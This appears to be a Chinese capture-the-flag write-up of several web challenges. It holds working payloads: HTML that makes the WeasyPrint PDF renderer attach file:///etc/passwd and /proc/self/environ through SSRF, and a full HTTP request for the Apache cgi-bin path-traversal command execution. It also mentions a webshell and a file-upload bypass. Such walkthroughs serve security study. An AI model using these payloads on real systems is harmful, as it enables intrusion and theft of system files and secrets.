http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484219&idx=1&sn=73564e316a4c9794019f15dd6b3ba9f6&chksm=c0e47a67f793f371e9f6a4fbc06e7929cb1480b7320fae34c32563307df3a28aca49d1a4addd&scene=21#wechat_redirect1.真亦假,假亦真:
六秒之后跳转到如下页面:
果真是标准一句话木马,尝试传参,但却无法正常执行。
扫目录,发现/flag,访问之即可获取到flag
2.CSDN_TO_PDFV1.2
网站功能大概就是将目标网页转换为PDF文件,但URL中必须包含blog.csdn.net,错一丁点都不行
包含指定字符串时,页面正常回显。
不包含指定字符串时,会提示:“invalid URL”'
参考:https://blog.csdn.net/RABCDXB/article/details/122659054,目标网站可能存在SSRF漏洞,可将blog.csdn.net作为GET传参,成功绕过。
没有VPS,可以尝试使用花生壳做内网穿透。先尝试做一个指纹识别,使用nc监听相应端口,让目标网站发起网络请求
可以看到UA头是:WeasyPrint 61.2,WeasyPrint是一个用于HTML和CSS的可视化渲染引擎,可以将HTML文档导出为打印标准的PDF文件。而WeasyPrint 重新定义了一组 html 标签,包括 img、embed、object 等,当使用link标签时,WeasyPrint会尝试引用(读取)目标链接所指向的内容并附加在PDF文档内。
可参考:
https://nahamsec.com/posts/my-expense-report-resulted-in-a-server-side-request-forgery-ssrf-on-lyft
在VPS新建一个index.html,可以绕过对于html字符串的过滤,内容为:
<!DOCTYPE html><html><head><title>cai</title></head><body><link rel = "attachment" href = "file:///etc/passwd"></body></html>
再次让目标服务器访问我们的VPS,读取网页内容并转换为PDF
使用binwalk分离该PDF文件,同时查看文件内容
可以看到成功读取了/etc/passwd文件内容,下一步就是读取flag文件,flag在/proc/self/environ文件中,修改html文件内容如下:
<!DOCTYPE html><html><head><title>cai</title></head><body><link rel = "attachment" href = "file:///proc/self/environ"></body></html>
以同样的方式处理PDF文件,成功读取flag
3.MYAPACHE
某杯的某个题目
apache2.4.5 存在命令执行漏洞。
参考:https://www.cnblogs.com/1zzZ/p/17637671.html
POC:
POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1Host: 192.168.19.107:8002Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 8echo; ls /
查看flag文件内容
base64解码,保存文件内容。
压缩包文件,需要密码。密码在/cgi-bin/test-cgi,密码是20240202ctf
4.ls就可以了
文件上传绕过,文件类型检测可用Gif绕过。
